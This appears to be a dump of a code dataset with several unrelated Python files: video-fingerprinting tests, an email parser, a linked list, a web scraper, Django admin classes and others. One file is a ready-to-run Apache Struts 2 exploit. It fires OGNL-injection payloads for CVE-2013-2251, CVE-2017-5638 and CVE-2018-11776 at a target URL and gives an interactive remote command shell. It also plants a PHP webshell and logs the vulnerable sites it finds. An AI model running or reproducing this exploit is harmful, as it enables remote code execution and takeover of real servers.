id stringlengths 1 265 | text stringlengths 6 5.19M | dataset_id stringclasses 7
values |
|---|---|---|
3274274 | <filename>tests/general_tests.py<gh_stars>1-10
import os
os.environ['WINNOW_CONFIG'] = os.path.abspath('config.yaml')
from glob import glob
import numpy as np
from winnow.feature_extraction import IntermediateCnnExtractor,frameToVideoRepresentation,SimilarityModel
from winnow.utils import create_directory,scan_videos,get_original_fn_from_artifact,create_video_list
import yaml
import pytest
import warnings
import shutil
NUMBER_OF_TEST_VIDEOS = 40
representations = ['frame_level','video_level','video_signatures']
with open("tests/config.yaml", 'r') as ymlfile:
cfg = yaml.safe_load(ymlfile)
# Load main config variables from the TEST config file
DATASET_DIR = cfg['video_source_folder']
DST_DIR = cfg['destination_folder']
VIDEO_LIST_TXT = cfg['video_list_filename']
ROOT_FOLDER_INTERMEDIATE_REPRESENTATION =cfg['root_folder_intermediate']
USE_DB = cfg['use_db']
CONNINFO = cfg['conninfo']
KEEP_FILES = cfg['keep_fileoutput']
FRAME_LEVEL_SAVE_FOLDER = os.path.abspath(DST_DIR + '{}/{}'.format(ROOT_FOLDER_INTERMEDIATE_REPRESENTATION,representations[0]))
VIDEO_SIGNATURES_FILENAME = 'video_signatures'
FRAME_LEVEL_SAVE_FOLDER = os.path.join(DST_DIR,ROOT_FOLDER_INTERMEDIATE_REPRESENTATION,representations[0])
VIDEO_LEVEL_SAVE_FOLDER = os.path.join(DST_DIR,ROOT_FOLDER_INTERMEDIATE_REPRESENTATION,representations[1])
VIDEO_SIGNATURES_SAVE_FOLDER = os.path.join(DST_DIR,ROOT_FOLDER_INTERMEDIATE_REPRESENTATION,representations[2])
VIDEO_SIGNATURES_FILENAME = 'video_signatures.npy'
HANDLE_DARK = str(cfg['filter_dark_videos'])
DETECT_SCENES = str(cfg['detect_scenes'])
MIN_VIDEO_DURATION = cfg['min_video_duration_seconds']
DISTANCE = float(cfg['match_distance'])
KEEP_FILES = cfg['keep_fileoutput']
# Ensures that the config file follows specs
# Ensure we do not have processed files from previous test runs
try:
shutil.rmtree('tests/test_data/test_output/representations/')
except:
pass
def test_config_input():
assert type(DATASET_DIR) == str, 'video_source_folder takes a string as a parameter'
assert type(DST_DIR) == str, 'destination_folder takes a string as a parameter'
assert type(ROOT_FOLDER_INTERMEDIATE_REPRESENTATION) == str, 'root_folder_intermediate takes a string as a parameter'
assert type(USE_DB) == bool, 'use_db takes a boolean as a parameter'
assert type(CONNINFO) == str, 'use_db takes a boolean as a parameter'
# additional tests for the inner string structure
# Ensures that config specifications are translated into the right file structure
create_directory(representations,DST_DIR,ROOT_FOLDER_INTERMEDIATE_REPRESENTATION)
frame_level_folder = os.path.join(DST_DIR,ROOT_FOLDER_INTERMEDIATE_REPRESENTATION,representations[0])
video_level_folder = os.path.join(DST_DIR,ROOT_FOLDER_INTERMEDIATE_REPRESENTATION,representations[1])
video_signatures_folder = os.path.join(DST_DIR,ROOT_FOLDER_INTERMEDIATE_REPRESENTATION,representations[2])
videos = scan_videos(DATASET_DIR,'**')
processed_videos = scan_videos(FRAME_LEVEL_SAVE_FOLDER,'**_vgg_features.npy')
processed_filenames = get_original_fn_from_artifact(processed_videos,'_vgg_features')
full_video_names = [os.path.basename(x) for x in videos]
remaining_videos = [i for i,x in enumerate(full_video_names) if x not in processed_filenames]
remaining_videos_path = np.array(videos)[remaining_videos]
VIDEOS_LIST = create_video_list(remaining_videos_path,VIDEO_LIST_TXT)
video_files_count = len(open(VIDEOS_LIST).readlines())
extractor = IntermediateCnnExtractor(VIDEOS_LIST,FRAME_LEVEL_SAVE_FOLDER)
extractor.start(batch_size=16, cores=4)
processed_videos_after_extraction = scan_videos(FRAME_LEVEL_SAVE_FOLDER,'**_vgg_features.npy')
processed_videos_features = np.array([np.load(x) for x in processed_videos_after_extraction if 'vgg_features' in x])
converter = frameToVideoRepresentation(FRAME_LEVEL_SAVE_FOLDER,VIDEO_LEVEL_SAVE_FOLDER)
converter.start()
processed_videos_vl = scan_videos(VIDEO_LEVEL_SAVE_FOLDER,'**_vgg_features.npy')
processed_videos_features_vl = np.array([np.load(x) for x in processed_videos_vl if 'vgg_features' in x])
sm = SimilarityModel()
video_signatures = sm.predict(VIDEO_LEVEL_SAVE_FOLDER)
video_signatures = np.nan_to_num(video_signatures)
SIGNATURES_FILEPATH = os.path.join(VIDEO_SIGNATURES_SAVE_FOLDER,'{}.npy'.format(VIDEO_SIGNATURES_FILENAME))
SIGNATURES_INDEX_FILEPATH = os.path.join(VIDEO_SIGNATURES_SAVE_FOLDER,'{}-filenames.npy'.format(VIDEO_SIGNATURES_FILENAME))
np.save(SIGNATURES_FILEPATH,video_signatures)
np.save(SIGNATURES_INDEX_FILEPATH,sm.original_filenames)
def test_directory_structure():
assert os.path.exists(frame_level_folder)
assert os.path.exists(video_level_folder)
assert os.path.exists(video_signatures_folder)
def test_videos_can_be_scanned():
assert len(videos) == NUMBER_OF_TEST_VIDEOS
assert len(processed_videos) == 0
def test_video_filenames_can_be_extracted():
assert len(full_video_names) == NUMBER_OF_TEST_VIDEOS
assert len(remaining_videos) == NUMBER_OF_TEST_VIDEOS
def test_video_list_creation():
assert video_files_count == NUMBER_OF_TEST_VIDEOS
def test_intermediate_cnn_extractor():
shapes_correct = [x.shape[1] for x in processed_videos_features if x.shape[1] == 4096]
assert len(processed_videos_after_extraction) == NUMBER_OF_TEST_VIDEOS
assert len(shapes_correct) == NUMBER_OF_TEST_VIDEOS
def test_frame_to_video_converter():
assert processed_videos_features_vl.shape == (NUMBER_OF_TEST_VIDEOS,1, 4096)
def test_signatures_shape():
assert video_signatures.shape == (NUMBER_OF_TEST_VIDEOS,500)
def test_signatures_fp():
vs = np.load(SIGNATURES_FILEPATH)
assert vs.shape == (NUMBER_OF_TEST_VIDEOS, 500)
| StarcoderdataPython |
175431 | <filename>txircd/modules/rfc/response_error.py
from twisted.plugin import IPlugin
from txircd.module_interface import IModuleData, ModuleData
from zope.interface import implements
class ErrorResponse(ModuleData):
implements(IPlugin, IModuleData)
name = "ErrorResponse"
core = True
def actions(self):
return [ ("quit", 10, self.sendError) ]
def sendError(self, user, reason):
user.sendMessage("ERROR", "Closing Link: {}@{} [{}]".format(user.ident, user.host(), reason), to=None, prefix=None)
errorResponse = ErrorResponse() | StarcoderdataPython |
4838485 | <filename>hotmail_eml_to_txt_converter/parser/HotmailEMLChainParser.py
import quopri as qp
from bs4 import BeautifulSoup
from hotmail_eml_to_txt_converter.parser.Email import Email
from datetime import datetime
class HotmailEMLChainParser():
# Parses .eml files downloaded from Hotmail into individual email objects.
# Constructor takes a file object such as that returned by open()
# Usage:
# parsed_chain = HotmailEMLChainParser(file_object)
#
# For emails in chain:
# parsed_chain.get_emails()
# For correspondents in chain:
# parsed_chain.get_correspondents()
def __init__(self, file_buffer):
self._emails = []
self._correspondents = {}
if file_buffer is None:
return
decoded = qp.decodestring(file_buffer.read())
decoded_utf = decoded.decode("utf-8")
html_start_idx = decoded_utf.find("<html>")
self._preamble = decoded_utf[:html_start_idx]
self._html = decoded_utf[html_start_idx:].replace(" ", "")
self._body_text = BeautifulSoup(self._html, "html.parser").get_text()
self._current_position = 0
self._parseChain()
def get_emails(self):
return self._emails
def get_correspondents(self):
return self._correspondents
def _parseChain(self):
# parses email chain and populates self.emails list
# parse initial email
next_email_index = self._find_next_email_index()
builder = self.EmailBuilder(self._preamble, self._body_text[:next_email_index], is_first_in_chain=True)
first_email = builder.build()
self._correspondents[first_email.sender_email] = first_email.sender_name
self._correspondents[first_email.receiver_email] = first_email.receiver_name
self._emails.append(first_email)
# parse remaining emails
while next_email_index != -1:
self._current_position = next_email_index
head_start = next_email_index
end_of_head = self._find_end_of_head()
self._current_position = end_of_head
next_email_index = self._find_next_email_index()
builder = self.EmailBuilder(self._body_text[head_start:end_of_head], self._body_text[end_of_head:next_email_index])
email = builder.build()
email.sender_name = self._correspondents.get(email.sender_email, "")
email.receiver_name = self._correspondents.get(email.receiver_email, "")
self._emails.append(email)
def _find_end_of_head(self):
date_index = self._body_text.find("Date:", self._current_position)
end_of_head_index = self._body_text.find("\n", date_index) + 1
return end_of_head_index
def _find_next_email_index(self):
return self._body_text.find("From:", self._current_position)
class EmailBuilder():
# Takes email head and body as strings, along with bool
# for whether it is the first email in chain and therefore
# the preamble must be taken into account
#
# Preamble should be in format:
#
# MIME-Version: 1.0
# Date: Sat, 1 Jan 2011 18:11:50 -0400
# From: Foo <<EMAIL>>
# Subject: RE:
# Thread-Topic: RE:
# To: Bar <<EMAIL>>
# Content-Transfer-Encoding: quoted-printable
# Content-Type: text/html; charset="utf-8"
#
# Subsequent emails should be in format:
#
# From: <EMAIL>
# To: <EMAIL>
# Subject:
# Date: Sat, 1 Jan 2011 14:50:14 +0000
def __init__(self, head, body, is_first_in_chain=False):
self._is_first_in_chain = is_first_in_chain
self._head = head
self._body = body
self._email = Email()
self._required_fields = ["To:", "From:", "Subject:", "Date:"]
def build(self):
# Builds email and returns Email object
if self._head:
self._parse_email()
return self._email
def _parse_email(self):
head_items = self._head.split("\n")
for item in head_items:
if item == "":
continue
field_end = item.find(":") + 1
field = item[:field_end]
if field in self._required_fields:
value = item[field_end:]
if field == "To:":
if self._is_first_in_chain:
name, email_address = self._parse_preamble_email(value)
self._email.sender_name = name
self._email.sender_email = email_address
else:
self._email.sender_email = value.strip()
elif field == "From:":
if self._is_first_in_chain:
name, email_address = self._parse_preamble_email(value)
self._email.receiver_name = name
self._email.receiver_email = email_address
else:
self._email.receiver_email = value.strip()
elif field == "Subject:":
self._email.subject = value.strip()
elif field == "Date:":
self._email.datetime_hotmail_format = value.strip()
dt = self._create_datetime_from_hotmail_format(self._email.datetime_hotmail_format)
self._email.date = dt.strftime("%Y-%m-%d")
self._email.time = dt.strftime("%H-%M-%S")
self._email.body = self._body.strip()
def _parse_preamble_email(self, email_field_value):
email_address_start = email_field_value.index("<")
name = email_field_value[:email_address_start].strip()
email_address = email_field_value[email_address_start:].strip("<>")
return (name, email_address)
def _create_datetime_from_hotmail_format(self, hotmail_format_string):
# Because %-d doesn't work in windows, these shenanigans must be done
datetime_elements = hotmail_format_string.split(" ")
day_of_month = int(datetime_elements[1])
if day_of_month < 10:
datetime_elements[1] = "0" + datetime_elements[1]
datetime_string = " ".join(datetime_elements)
# End of shenanigans
dt = datetime.strptime(datetime_string, "%a, %d %b %Y %H:%M:%S %z")
return dt
| StarcoderdataPython |
183587 | <reponame>ShaswatPrabhat/LinkedList
from LinkedList import LinkedListNodes
class SinglyLinkedList:
def __init__(self, sourceList: list):
lastInitializedNode: LinkedListNodes.SinglyLinkedNode or None = None
self.headOfList: LinkedListNodes.SinglyLinkedNode or None = None
self.length = len(sourceList)
for value in sourceList:
node = LinkedListNodes.SinglyLinkedNode(val=value)
if self.headOfList is None:
self.headOfList = node
lastInitializedNode = node
if lastInitializedNode is not None:
lastInitializedNode.setNext(node)
lastInitializedNode = node
def __len__(self) -> int:
return self.length
def isEmptyList(self) -> bool:
return self.headOfList is None
def traverseList(self) -> None:
print("Traversing linked list")
if not self.isEmptyList():
if self.hasCycle():
print("LinkedList contains a cycle, traversal will be infinite LOL!")
else:
node = self.headOfList
while node.getNext() is not None:
print(node.val)
node = node.getNext()
print(node.val)
else:
print("EMPTY LIST!!")
def findValue(self, value) -> LinkedListNodes.SinglyLinkedNode or None:
if not self.isEmptyList():
node = self.headOfList
while node.val != value:
node = node.getNext()
if node is not None:
return node
return None
else:
print("Empty List")
def deleteFirstNode(self) -> bool:
if not self.isEmptyList():
self.headOfList = self.headOfList.getNext()
self.length -= 1
return True
else:
print("Empty list")
return False
def deleteLastNode(self) -> bool:
if self.isEmptyList():
print("Empty list")
return False
elif self.length == 1:
self.headOfList = None
self.length -= 1
return True
else:
node = self.headOfList
# Get the value from previous node of the next node
# Change penultimate node to None
while node.getNext().getNext() is not None:
node = node.getNext()
node.setNext(None)
self.length -= 1
return True
def deleteValue(self, value) -> bool:
if self.isEmptyList():
print("Empty list")
return False
elif self.length == 1:
if self.headOfList.val == value:
self.headOfList = None
self.length -= 1
return True
else:
return False
else:
node = self.headOfList
while node.getNext() is not None and node.getNext().val is not value:
node = node.getNext()
if node.getNext() is None:
return False
node.setNext(node.getNext().getNext())
self.length -= 1
return True
def insertAfterValue(self, value, valueToBeInserted) -> bool:
if self.isEmptyList():
print("Empty list")
return False
else:
node = self.headOfList
while node is not None:
if node.val == value:
newNode = LinkedListNodes.SinglyLinkedNode(val=valueToBeInserted)
newNode.setNext(node.getNext())
node.setNext(newNode)
self.length += 1
return True
node = node.getNext()
return False
def insertValueInBeginning(self, value):
newNode = LinkedListNodes.SinglyLinkedNode(value)
if self.isEmptyList():
self.headOfList = newNode
else:
newNode.setNext(self.headOfList)
self.headOfList = newNode
self.length += 1
def __getitem__(self, item):
if type(item) is not int:
print("Please enter subscriptable index integers only")
return None
if self.isEmptyList():
print("Empty list")
return None
if self.length < item:
print("Index too large, list too small")
return None
counter = 0
node = self.headOfList
while counter != item:
node = node.getNext()
counter += 1
return node.val
def hasCycle(self) -> bool:
if self.isEmptyList():
return False
slow = self.headOfList
fast = self.headOfList.getNext()
while slow.val != fast.val:
if fast is None or fast.getNext() is None:
return False
slow = slow.getNext()
fast = fast.getNext().getNext()
return True
| StarcoderdataPython |
1718741 | import logging
from time import sleep, time
from bs4 import BeautifulSoup
from xml.etree import ElementTree
import requests
USER_AGENT = ('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) '
'AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 '
'Safari/605.1.15')
class Site(object):
"""Anime site"""
BASE_URL = None
NAMES = None
MIN_RATING = None
MAX_RATING = None
DYNAMIC_ID = False
MIN_ACTION_INTERVAL = 0
SEARCH_LOCALES = ['ja-jp']
def __init__(self):
self.session = requests.Session()
self.session.headers['User-Agent'] = USER_AGENT
self._last_action_epoch = 0
def _get(self, url, **kws):
return self.session.get(url, **kws)
def _post(self, url, **kws):
return self.session.post(url, **kws)
def _get_soup(self, url, parser='html5lib', **kws):
return BeautifulSoup(self._get(url, **kws).text, parser)
def _post_soup(self, url, parser='html5lib', **kws):
return BeautifulSoup(self._post(url, **kws).text, parser)
def _get_json(self, url, **kws):
return self._get(url, **kws).json()
def _post_json(self, url, json, **kws):
return self._post(url, json=json, **kws).json()
def _get_xml(self, url, **kws):
return ElementTree.fromstring(self._get(url, **kws).content)
def _sleep_if_needed(self):
delay = self._last_action_epoch + self.MIN_ACTION_INTERVAL - time()
if delay > 0:
sleep(delay)
self._last_action_epoch = time()
def unify_rating(self, rating):
return ((rating - self.MIN_RATING) /
(self.MAX_RATING - self.MIN_RATING) * 100)
def get_rating(self, id):
try:
self._sleep_if_needed()
return self._get_rating(id)
except Exception:
return None, None
def search(self, names):
for locale in self.SEARCH_LOCALES:
if locale in names:
self._sleep_if_needed()
try:
return self._search(names[locale])
except Exception:
pass # No worries, just try next locale.
return None
def info_url(self, id):
raise NotImplementedError
def _get_rating(self, id):
raise NotImplementedError
def _search(self, name):
raise NotImplementedError
def main(site, names):
logging.basicConfig(level=logging.DEBUG)
id = site.search(names)
if id is None:
return
print(site.info_url(id))
rating, count = site.get_rating(id)
if rating is not None:
unified_rating = site.unify_rating(rating)
else:
unified_rating = None
print(f'{rating} ({count}), {unified_rating}')
| StarcoderdataPython |
3225520 | <filename>exploit/webapp/apache/Apache_Struts_2_CVE-2013-2251.py
#!/usr/bin/python
from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import input
from builtins import str
import urllib.request, urllib.error, urllib.parse
import time
import sys
import os
import subprocess
import requests
import readline
import urllib.parse
RED = '\033[1;31m'
BLUE = '\033[94m'
BOLD = '\033[1m'
GREEN = '\033[32m'
OTRO = '\033[36m'
YELLOW = '\033[33m'
ENDC = '\033[0m'
def cls():
os.system(['clear', 'cls'][os.name == 'nt'])
cls()
host = sys.argv[1]
if len(host) > 0:
if host.find("https://") != -1 or host.find("http://") != -1:
poc = "?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27mamalo%27%29,%23w.flush%28%29,%23w.close%28%29}"
def exploit(comando):
exploit = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+comando+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}"
return exploit
def exploit2(comando):
exploit2 = "Content-Type:%{(+++#_='multipart/form-data').(+++#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(+++#_memberAccess?(+++#_memberAccess=#dm):((+++#container=#context['com.opensymphony.xwork2.ActionContext.container']).(+++#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(+++#ognlUtil.getExcludedPackageNames().clear()).(+++#ognlUtil.getExcludedClasses().clear()).(+++#context.setMemberAccess(+++#dm)))).(+++#shell='"+str(comando)+"').(+++#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(+++#shells=(+++#iswin?{'cmd.exe','/c',#shell}:{'/bin/sh','-c',#shell})).(+++#p=new java.lang.ProcessBuilder(+++#shells)).(+++#p.redirectErrorStream(true)).(+++#process=#p.start()).(+++#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(+++#process.getInputStream(),#ros)).(+++#ros.flush())}"
return exploit2
def exploit3(comando):
exploit3 = "%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27"+comando+"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D"
return exploit3
def pwnd(shellfile):
exploitfile = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+shellfile+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}"
return exploitfile
def validador():
arr_lin_win = ["file%20/etc/passwd","dir","net%20users","id","/sbin/ifconfig","cat%20/etc/passwd"]
return arr_lin_win
#def reversepl(ip,port):
# print "perl"
#def reversepy(ip,port):
# print "python"
# CVE-2013-2251 ---------------------------------------------------------------------------------
try:
response = ''
response = urllib.request.urlopen(host+poc)
except:
print(RED+" Servidor no responde\n"+ENDC)
exit(0)
print(BOLD+"\n [+] EJECUTANDO EXPLOIT CVE-2013-2251"+ENDC)
if response.read().find("mamalo") != -1:
print(RED+" [-] VULNERABLE"+ENDC)
owned = open('vulnsite.txt', 'a')
owned.write(str(host)+'\n')
owned.close()
opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC)
#print BOLD+" * [SHELL REVERSA]"+ENDC
#print OTRO+" Struts@Shell:$ reverse 127.0.0.1 4444 (perl,python,bash)\n"+ENDC
if opcion == 's':
print(YELLOW+" [-] GET PROMPT...\n"+ENDC)
time.sleep(1)
print(BOLD+" * [UPLOAD SHELL]"+ENDC)
print(OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC)
while 1:
separador = input(GREEN+"Struts2@Shell_1:$ "+ENDC)
espacio = separador.split(' ')
comando = "','".join(espacio)
if espacio[0] != 'reverse' and espacio[0] != 'pwnd':
shell = urllib.request.urlopen(host+exploit("'"+str(comando)+"'"))
print("\n"+shell.read())
elif espacio[0] == 'pwnd':
pathsave=input("path EJ:/tmp/: ")
if espacio[1] == 'php':
shellfile = """'python','-c','f%3dopen("/tmp/status.php","w");f.write("<?php%20system($_GET[ksujenenuhw])?>")'"""
urllib.request.urlopen(host+pwnd(str(shellfile)))
shell = urllib.request.urlopen(host+exploit("'ls','-l','"+pathsave+"status.php'"))
if shell.read().find(pathsave+"status.php") != -1:
print(BOLD+GREEN+"\nCreate File Successfull :) ["+pathsave+"status.php]\n"+ENDC)
else:
print(BOLD+RED+"\nNo Create File :/\n"+ENDC)
# CVE-2017-5638 ---------------------------------------------------------------------------------
print(BLUE+" [-] NO VULNERABLE"+ENDC)
print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2017-5638"+ENDC)
x = 0
while x < len(validador()):
valida = validador()[x]
try:
req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(valida))})
result = urllib.request.urlopen(req).read()
if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1:
print(RED+" [-] VULNERABLE"+ENDC)
owned = open('vulnsite.txt', 'a')
owned.write(str(host)+'\n')
owned.close()
opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC)
if opcion == 's':
print(YELLOW+" [-] GET PROMPT...\n"+ENDC)
time.sleep(1)
while 1:
try:
separador = input(GREEN+"\nStruts2@Shell_2:$ "+ENDC)
req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(separador))})
result = urllib.request.urlopen(req).read()
print("\n"+result)
except:
exit(0)
else:
x = len(validador())
else:
print(BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x))
except:
pass
x=x+1
# CVE-2018-11776 ---------------------------------------------------------------------------------
print(BLUE+" [-] NO VULNERABLE"+ENDC)
print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2018-11776"+ENDC)
x = 0
while x < len(validador()):
#Filtramos la url solo dominio
url = host.replace('#', '%23')
url = host.replace(' ', '%20')
if ('://' not in url):
url = str("http://") + str(url)
scheme = urllib.parse.urlparse(url).scheme
site = scheme + '://' + urllib.parse.urlparse(url).netloc
#Filtramos la url solo path
file_path = urllib.parse.urlparse(url).path
if (file_path == ''):
file_path = '/'
valida = validador()[x]
try:
result = requests.get(site+"/"+exploit3(str(valida))+file_path).text
if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1:
print(RED+" [-] VULNERABLE"+ENDC)
owned = open('vulnsite.txt', 'a')
owned.write(str(host)+'\n')
owned.close()
opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC)
if opcion == 's':
print(YELLOW+" [-] GET PROMPT...\n"+ENDC)
time.sleep(1)
print(BOLD+" * [UPLOAD SHELL]"+ENDC)
print(OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC)
while 1:
separador = input(GREEN+"Struts2@Shell_3:$ "+ENDC)
espacio = separador.split(' ')
comando = "%20".join(espacio)
shell = urllib.request.urlopen(host+exploit3(str(comando)))
print("\n"+shell.read())
else:
x = len(validador())
exit(0)
else:
print(BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x))
except:
pass
x=x+1
else:
print(RED+" Debe introducir el protocolo (https o http) para el dominio\n"+ENDC)
exit(0)
else:
print(RED+" Debe Ingresar una Url\n"+ENDC)
exit(0)
| StarcoderdataPython |
1754270 | ### Exercicio 4 e 5
def primo(v):
for i in range(2,(v//2)+1):
if v % i == 0: return False
return True
### Exercicio 4
valor = int(input("Digite um valor: "))
if primo(valor): print(f"{valor} e primo!")
else: print(f"{valor} nao e primo!")
print("\n\n")
### Exercicio 5
f = int(input("Digite o valor do final da contagem: "))
primos = []
for i in range(2,f+1):
if primo(i): primos.append(i)
print("Os valores primos sao: ",*primos)
| StarcoderdataPython |
3336673 | from pygbif import species
from .format_helpers import _make_id
def gbif_query_for_single_name(name, rank):
response = species.name_usage(name=name, rank=rank.upper())["results"]
return response
def process_gbif_response(list_of_response_dicts, rank):
key = rank + "Key"
extracted_ids = list(
map(
lambda x: _make_id(x.get(key, None), x.get(rank, None), rank, "gbif"),
list_of_response_dicts,
)
)
return extracted_ids
| StarcoderdataPython |
1723968 | from django.contrib import admin
from imagekit.admin import AdminThumbnail
from common.admin import AutoUserMixin
from shapes.models import SubmittedShape, \
MaterialShape, ShapeSubstance, ShapeSubstanceLabel, \
ShapeName, MaterialShapeNameLabel, MaterialShapeQuality
from normals.models import ShapeRectifiedNormalLabel
from bsdfs.models import ShapeBsdfLabel_mf, ShapeBsdfLabel_wd
# inlines
class ShapeLabelInlineBase(AutoUserMixin, admin.TabularInline):
extra = 1
class ShapeAdmin(AutoUserMixin, admin.ModelAdmin):
fieldsets = [
(None, {
'fields': ['added', 'photo', 'user', 'vertices', 'num_vertices']
}),
]
readonly_fields = ['added', 'admin_thumb_span6']
list_display = ['user', 'admin_thumb_span1', 'added', 'num_vertices']
list_filter = ['added', 'correct', 'planar']
search_fields = ['user', 'photo']
date_hierarchy = 'added'
admin_thumb_span6 = AdminThumbnail(image_field='image_span6')
admin_thumb_span1 = AdminThumbnail(image_field='thumb_span1')
class MaterialShapeAdmin(ShapeAdmin):
class SubmittedShapeInline(ShapeLabelInlineBase):
model = SubmittedShape
class ShapeSubstanceLabelInline(ShapeLabelInlineBase):
model = ShapeSubstanceLabel
class ShapeBsdfLabelInline_mf(ShapeLabelInlineBase):
model = ShapeBsdfLabel_mf
class ShapeBsdfLabelInline_wd(ShapeLabelInlineBase):
model = ShapeBsdfLabel_wd
class ShapeRectifiedNormalLabelInline(ShapeLabelInlineBase):
model = ShapeRectifiedNormalLabel
inlines = [SubmittedShapeInline,
ShapeSubstanceLabelInline,
ShapeBsdfLabelInline_mf,
ShapeBsdfLabelInline_wd,
ShapeRectifiedNormalLabelInline]
admin.site.register(MaterialShape, MaterialShapeAdmin)
class SubmittedShapeAdmin(AutoUserMixin, admin.ModelAdmin):
pass
admin.site.register(SubmittedShape, SubmittedShapeAdmin)
class ShapeNameAdmin(AutoUserMixin, admin.ModelAdmin):
pass
admin.site.register(ShapeName, ShapeNameAdmin)
class MaterialShapeNameLabelAdmin(AutoUserMixin, admin.ModelAdmin):
pass
admin.site.register(MaterialShapeNameLabel, MaterialShapeNameLabelAdmin)
class ShapeSubstanceAdmin(AutoUserMixin, admin.ModelAdmin):
pass
admin.site.register(ShapeSubstance, ShapeSubstanceAdmin)
class ShapeSubstanceLabelAdmin(AutoUserMixin, admin.ModelAdmin):
pass
admin.site.register(ShapeSubstanceLabel, ShapeSubstanceLabelAdmin)
class MaterialShapeQualityAdmin(AutoUserMixin, admin.ModelAdmin):
pass
admin.site.register(MaterialShapeQuality, MaterialShapeQualityAdmin)
| StarcoderdataPython |
1639780 | <gh_stars>0
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class Sighting(object):
"""
Sighting details.
"""
#: A constant which can be used with the classification_status property of a Sighting.
#: This constant has a value of "FALSE_POSITIVE"
CLASSIFICATION_STATUS_FALSE_POSITIVE = "FALSE_POSITIVE"
#: A constant which can be used with the classification_status property of a Sighting.
#: This constant has a value of "FALSE_NEGATIVE"
CLASSIFICATION_STATUS_FALSE_NEGATIVE = "FALSE_NEGATIVE"
#: A constant which can be used with the classification_status property of a Sighting.
#: This constant has a value of "TRUE_POSITIVE"
CLASSIFICATION_STATUS_TRUE_POSITIVE = "TRUE_POSITIVE"
#: A constant which can be used with the classification_status property of a Sighting.
#: This constant has a value of "TRUE_NEGATIVE"
CLASSIFICATION_STATUS_TRUE_NEGATIVE = "TRUE_NEGATIVE"
#: A constant which can be used with the classification_status property of a Sighting.
#: This constant has a value of "NOT_CLASSIFIED"
CLASSIFICATION_STATUS_NOT_CLASSIFIED = "NOT_CLASSIFIED"
#: A constant which can be used with the severity property of a Sighting.
#: This constant has a value of "CRITICAL"
SEVERITY_CRITICAL = "CRITICAL"
#: A constant which can be used with the severity property of a Sighting.
#: This constant has a value of "HIGH"
SEVERITY_HIGH = "HIGH"
#: A constant which can be used with the severity property of a Sighting.
#: This constant has a value of "MEDIUM"
SEVERITY_MEDIUM = "MEDIUM"
#: A constant which can be used with the severity property of a Sighting.
#: This constant has a value of "LOW"
SEVERITY_LOW = "LOW"
#: A constant which can be used with the severity property of a Sighting.
#: This constant has a value of "MINOR"
SEVERITY_MINOR = "MINOR"
#: A constant which can be used with the confidence property of a Sighting.
#: This constant has a value of "CRITICAL"
CONFIDENCE_CRITICAL = "CRITICAL"
#: A constant which can be used with the confidence property of a Sighting.
#: This constant has a value of "HIGH"
